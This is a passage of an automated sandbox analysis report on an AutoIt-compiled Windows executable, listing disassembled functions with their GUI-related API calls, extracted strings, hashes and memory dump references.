                                          • Part of subcall function 00F0AB60: SetBkColor.GDI32(?,00000000), ref: 00F0AC03
                                          • Part of subcall function 00F0AB60: SelectObject.GDI32(?,?), ref: 00F0AC10
                                          • Part of subcall function 00F0AB60: InflateRect.USER32(?,000000FF,000000FF), ref: 00F0AC2F
                                          • Part of subcall function 00F0AB60: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00F0AC46
                                          • Part of subcall function 00F0AB60: GetWindowLongW.USER32(00000000,000000F0), ref: 00F0AC5B
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                                        • String ID:
                                        • API String ID: 4124339563-0
                                        • Opcode ID: 921d167f2dd4f784c62c4324c9dbc90de69c878c4ea45ad1d30d63de728ae850
                                        • Instruction ID: e13158a6feaca2a82b6838d4095c51cc8e6cccb75c8989b19eb12c7251c7ad0f
                                        • Opcode Fuzzy Hash: 921d167f2dd4f784c62c4324c9dbc90de69c878c4ea45ad1d30d63de728ae850
                                        • Instruction Fuzzy Hash: 91A19C72508305EFD7209F64DC08A6BBBA9FF89331F144A29F962D61E0D735D848EB52
                                        Function 00EF77BE Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 284windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • DestroyWindow.USER32(00000000), ref: 00EF77F1
                                        • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00EF78B0
                                        • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 00EF78EE
                                        • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 00EF7900
                                        • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00EF7946
                                        • GetClientRect.USER32(00000000,?), ref: 00EF7952
                                        • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 00EF7996
                                        • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00EF79A5
                                        • GetStockObject.GDI32(00000011), ref: 00EF79B5
                                        • SelectObject.GDI32(00000000,00000000), ref: 00EF79B9
                                        • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 00EF79C9
                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00EF79D2
                                        • DeleteDC.GDI32(00000000), ref: 00EF79DB
                                        • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00EF7A07
                                        • SendMessageW.USER32(00000030,00000000,00000001), ref: 00EF7A1E
                                        • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 00EF7A59
                                        • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00EF7A6D
                                        • SendMessageW.USER32(00000404,00000001,00000000), ref: 00EF7A7E
                                        • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 00EF7AAE
                                        • GetStockObject.GDI32(00000011), ref: 00EF7AB9
                                        • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00EF7AC4
                                        • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 00EF7ACE
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                        • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                        • API String ID: 2910397461-517079104
                                        • Opcode ID: 989bc67ee921fff0ae3f374bdd0af56802331fb37d336e678fb2551d61d26345
                                        • Instruction ID: d44ac87204ec994e07373b72aadb0906a3459194818667b76febf9715cbd9e94
                                        • Opcode Fuzzy Hash: 989bc67ee921fff0ae3f374bdd0af56802331fb37d336e678fb2551d61d26345
                                        • Instruction Fuzzy Hash: 02A15F75A40219BFEB14DBA4DC4AFAE7BB9EB49710F044114FA19E72E0C7B0AD04DB61
                                        Function 00EEAF7B Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 186COMMON
                                        Download Yara Rule
                                        APIs
                                        • SetErrorMode.KERNEL32(00000001), ref: 00EEAF89
                                        • GetDriveTypeW.KERNEL32(?,00F0FAC0,?,\\.\,00F0F910), ref: 00EEB066
                                        • SetErrorMode.KERNEL32(00000000,00F0FAC0,?,\\.\,00F0F910), ref: 00EEB1C4
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: ErrorMode$DriveType
                                        • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                        • API String ID: 2907320926-4222207086
                                        • Opcode ID: c82f5ff8c1501a6991ca82a93e1d60e4362846d52c078c6bf1362dfe17401c8b
                                        • Instruction ID: 9abbc3f335ec2f3b01adc6429f19620ac5393185bb445900719cb2cedb303f4d
                                        • Opcode Fuzzy Hash: c82f5ff8c1501a6991ca82a93e1d60e4362846d52c078c6bf1362dfe17401c8b
                                        • Instruction Fuzzy Hash: 7951C13068138DEBCB14EB13C9E29BE73F0AB54365B246026E44AB7291D735ED41EB43
                                        Function 00E86A3C Relevance: 44.0, APIs: 12, Strings: 13, Instructions: 275COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: __wcsnicmp
                                        • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                        • API String ID: 1038674560-86951937
                                        • Opcode ID: 7dcaf03eff2bd46dc81def023a1571f228d9fbe427028ff8ce1462f4f1289fe2
                                        • Instruction ID: c759e0256e06fb9216690c9864a0f20e3954eaaad4eddecac0ba95c75d29e679
                                        • Opcode Fuzzy Hash: 7dcaf03eff2bd46dc81def023a1571f228d9fbe427028ff8ce1462f4f1289fe2
                                        • Instruction Fuzzy Hash: 888145B1600215BBCB25BF60CD82FEF37A8AF16704F046025F94DBA1C2EB60EA51D791
                                        Function 00E82C18 Relevance: 42.5, APIs: 23, Strings: 1, Instructions: 486windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • DestroyWindow.USER32(?,?,?), ref: 00E82CA2
                                        • DeleteObject.GDI32(00000000), ref: 00E82CE8
                                        • DeleteObject.GDI32(00000000), ref: 00E82CF3
                                        • DestroyCursor.USER32(00000000), ref: 00E82CFE
                                        • DestroyWindow.USER32(00000000,?,?,?), ref: 00E82D09
                                        • SendMessageW.USER32(?,00001308,?,00000000), ref: 00EBC68B
                                        • 6F550200.COMCTL32(?,000000FF,?), ref: 00EBC6C4
                                        • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00EBCAED
                                          • Part of subcall function 00E81B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00E82036,?,00000000,?,?,?,?,00E816CB,00000000,?), ref: 00E81B9A
                                        • SendMessageW.USER32(?,00001053), ref: 00EBCB2A
                                        • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00EBCB41
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: DestroyMessageSendWindow$DeleteObject$CursorF550200InvalidateMoveRect
                                        • String ID: 0
                                        • API String ID: 2586706302-4108050209
                                        • Opcode ID: 3084c8f4d4bcf36ba6c4f94cddd97f1bb538b0aad7506be72575b0488234fa1d
                                        • Instruction ID: 6ca861d91b18a2507552a23fb36f331c56ac147dc5429b0b1db9e60b8e5fbeb6
                                        • Opcode Fuzzy Hash: 3084c8f4d4bcf36ba6c4f94cddd97f1bb538b0aad7506be72575b0488234fa1d
                                        • Instruction Fuzzy Hash: C412A130608201EFDB24DF24C884BAAB7E5BF45304F64556DF59AEB662C731EC41DB91
                                        Function 00F0AB60 Relevance: 39.2, APIs: 26, Instructions: 201windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetSysColor.USER32(00000012), ref: 00F0AB99
                                        • SetTextColor.GDI32(?,?), ref: 00F0AB9D
                                        • GetSysColorBrush.USER32(0000000F), ref: 00F0ABB3
                                        • GetSysColor.USER32(0000000F), ref: 00F0ABBE
                                        • CreateSolidBrush.GDI32(?), ref: 00F0ABC3
                                        • GetSysColor.USER32(00000011), ref: 00F0ABDB
                                        • CreatePen.GDI32(00000000,00000001,00743C00), ref: 00F0ABE9
                                        • SelectObject.GDI32(?,00000000), ref: 00F0ABFA
                                        • SetBkColor.GDI32(?,00000000), ref: 00F0AC03
                                        • SelectObject.GDI32(?,?), ref: 00F0AC10
                                        • InflateRect.USER32(?,000000FF,000000FF), ref: 00F0AC2F
                                        • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00F0AC46
                                        • GetWindowLongW.USER32(00000000,000000F0), ref: 00F0AC5B
                                        • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00F0ACA7
                                        • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00F0ACCE
                                        • InflateRect.USER32(?,000000FD,000000FD), ref: 00F0ACEC
                                        • DrawFocusRect.USER32(?,?), ref: 00F0ACF7
                                        • GetSysColor.USER32(00000011), ref: 00F0AD05
                                        • SetTextColor.GDI32(?,00000000), ref: 00F0AD0D
                                        • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 00F0AD21
                                        • SelectObject.GDI32(?,00F0A869), ref: 00F0AD38
                                        • DeleteObject.GDI32(?), ref: 00F0AD43
                                        • SelectObject.GDI32(?,?), ref: 00F0AD49
                                        • DeleteObject.GDI32(?), ref: 00F0AD4E
                                        • SetTextColor.GDI32(?,?), ref: 00F0AD54
                                        • SetBkColor.GDI32(?,?), ref: 00F0AD5E
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                        • String ID:
                                        • API String ID: 1996641542-0
                                        • Opcode ID: 0a1a80616519edfb19ac855b972a81db0bd4d9e1a39f1aa1872c1f7a794476a4
                                        • Instruction ID: 34b303649f8572aeffba43643b59e7ae6818e60c33d09b0474452c240be5fc1d
                                        • Opcode Fuzzy Hash: 0a1a80616519edfb19ac855b972a81db0bd4d9e1a39f1aa1872c1f7a794476a4
                                        • Instruction Fuzzy Hash: 6F614D71D00218EFDF219FA4DC48EAE7BB9FB08320F158125F915AB2E1D6759D40EB90
                                        Function 00F08C44 Relevance: 38.9, APIs: 21, Strings: 1, Instructions: 401windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00F08D34
                                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00F08D45
                                        • CharNextW.USER32(0000014E), ref: 00F08D74
                                        • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00F08DB5
                                        • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00F08DCB
                                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00F08DDC
                                        • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00F08DF9
                                        • SetWindowTextW.USER32(?,0000014E), ref: 00F08E45
                                        • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00F08E5B
                                        • SendMessageW.USER32(?,00001002,00000000,?), ref: 00F08E8C
                                        • _memset.LIBCMT ref: 00F08EB1
                                        • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00F08EFA
                                        • _memset.LIBCMT ref: 00F08F59
                                        • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00F08F83
                                        • SendMessageW.USER32(?,00001074,?,00000001), ref: 00F08FDB
                                        • SendMessageW.USER32(?,0000133D,?,?), ref: 00F09088
                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 00F090AA
                                        • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00F090F4
                                        • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00F09121
                                        • DrawMenuBar.USER32(?), ref: 00F09130
                                        • SetWindowTextW.USER32(?,0000014E), ref: 00F09158
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                        • String ID: 0
                                        • API String ID: 1073566785-4108050209
                                        • Opcode ID: 75dad3ff763309b7bdf55cc49dc88aeda6671628561ec07b211f85068361f81c
                                        • Instruction ID: 4c7ae112bcca969d9433e2dada842e012e7c4f14e3cabc5fa928c991c0e591b4
                                        • Opcode Fuzzy Hash: 75dad3ff763309b7bdf55cc49dc88aeda6671628561ec07b211f85068361f81c
                                        • Instruction Fuzzy Hash: 45E19071901209ABDF209F60CC84EEE7BB9FF05760F108159F955AA2D1DB709A86FF60
                                        Function 00F04B16 Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 290windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetCursorPos.USER32(?), ref: 00F04C51
                                        • GetDesktopWindow.USER32 ref: 00F04C66
                                        • GetWindowRect.USER32(00000000), ref: 00F04C6D
                                        • GetWindowLongW.USER32(?,000000F0), ref: 00F04CCF
                                        • DestroyWindow.USER32(?), ref: 00F04CFB
                                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00F04D24
                                        • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00F04D42
                                        • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00F04D68
                                        • SendMessageW.USER32(?,00000421,?,?), ref: 00F04D7D
                                        • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00F04D90
                                        • IsWindowVisible.USER32(?), ref: 00F04DB0
                                        • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00F04DCB
                                        • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00F04DDF
                                        • GetWindowRect.USER32(?,?), ref: 00F04DF7
                                        • MonitorFromPoint.USER32(?,?,00000002), ref: 00F04E1D
                                        • GetMonitorInfoW.USER32(00000000,?), ref: 00F04E37
                                        • CopyRect.USER32(?,?), ref: 00F04E4E
                                        • SendMessageW.USER32(?,00000412,00000000), ref: 00F04EB9
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                        • String ID: ($0$tooltips_class32
                                        • API String ID: 698492251-4156429822
                                        • Opcode ID: 28600dbb76e568d6e14543f74da680be5795b70f018cc676f58faf295e73402c
                                        • Instruction ID: 5bd5b3ee407792f1075ccaff9007a29efa8732f1bf09c819b8d2fc8ce9ddde79
                                        • Opcode Fuzzy Hash: 28600dbb76e568d6e14543f74da680be5795b70f018cc676f58faf295e73402c
                                        • Instruction Fuzzy Hash: 7CB18FB1A04340AFDB14DF64C845B6ABBE4FF84710F04891CF599AB2A1D771EC05EB55
                                        Function 00E827D9 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 286windowtimeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00E828BC
                                        • GetSystemMetrics.USER32(00000007), ref: 00E828C4
                                        • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00E828EF
                                        • GetSystemMetrics.USER32(00000008), ref: 00E828F7
                                        • GetSystemMetrics.USER32(00000004), ref: 00E8291C
                                        • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00E82939
                                        • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00E82949
                                        • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00E8297C
                                        • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00E82990
                                        • GetClientRect.USER32(00000000,000000FF), ref: 00E829AE
                                        • GetStockObject.GDI32(00000011), ref: 00E829CA
                                        • SendMessageW.USER32(00000000,00000030,00000000), ref: 00E829D5
                                          • Part of subcall function 00E82344: GetCursorPos.USER32(?), ref: 00E82357
                                          • Part of subcall function 00E82344: ScreenToClient.USER32(00F467B0,?), ref: 00E82374
                                          • Part of subcall function 00E82344: GetAsyncKeyState.USER32(00000001), ref: 00E82399
                                          • Part of subcall function 00E82344: GetAsyncKeyState.USER32(00000002), ref: 00E823A7
                                        • SetTimer.USER32(00000000,00000000,00000028,00E81256), ref: 00E829FC
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                        • String ID: AutoIt v3 GUI
                                        • API String ID: 1458621304-248962490
                                        • Opcode ID: 4dc17e0545de0f251d43837afb591add014f4124e6bbc62cb1c84fed417e032f
                                        • Instruction ID: 6a9f63ee3f401661a406faf7b773db282d56314721f80ac0e336bc9d9d852fb3
                                        • Opcode Fuzzy Hash: 4dc17e0545de0f251d43837afb591add014f4124e6bbc62cb1c84fed417e032f
                                        • Instruction Fuzzy Hash: 6EB15E75A0020AAFDB14EFA8DC45BEE7BB4FB08714F109229FA19E7290DB749841DB51
                                        Function 00F04069 Relevance: 28.3, APIs: 3, Strings: 13, Instructions: 283windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CharUpperBuffW.USER32(?,?), ref: 00F040F6
                                        • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00F041B6
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: BuffCharMessageSendUpper
                                        • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                        • API String ID: 3974292440-719923060
                                        • Opcode ID: aa3b00ec91be640401f9f8302ffe009498ffcfd0142515888b074f007775cacf
                                        • Instruction ID: 9adc3119abac3979e25d2f8cf0b9333bc2b1f5c1a1d0ec74e2d0955723bafaca
                                        • Opcode Fuzzy Hash: aa3b00ec91be640401f9f8302ffe009498ffcfd0142515888b074f007775cacf
                                        • Instruction Fuzzy Hash: 8CA180B16142019FCB14EF10C991A6AB3E5BF88324F145969B99A6B3D3DB30FC05EB51
                                        Function 00EF52F0 Relevance: 27.1, APIs: 18, Instructions: 124COMMON
                                        Download Yara Rule
                                        APIs
                                        • LoadCursorW.USER32(00000000,00007F89), ref: 00EF5309
                                        • LoadCursorW.USER32(00000000,00007F8A), ref: 00EF5314
                                        • LoadCursorW.USER32(00000000,00007F00), ref: 00EF531F
                                        • LoadCursorW.USER32(00000000,00007F03), ref: 00EF532A
                                        • LoadCursorW.USER32(00000000,00007F8B), ref: 00EF5335
                                        • LoadCursorW.USER32(00000000,00007F01), ref: 00EF5340
                                        • LoadCursorW.USER32(00000000,00007F81), ref: 00EF534B
                                        • LoadCursorW.USER32(00000000,00007F88), ref: 00EF5356
                                        • LoadCursorW.USER32(00000000,00007F80), ref: 00EF5361
                                        • LoadCursorW.USER32(00000000,00007F86), ref: 00EF536C
                                        • LoadCursorW.USER32(00000000,00007F83), ref: 00EF5377
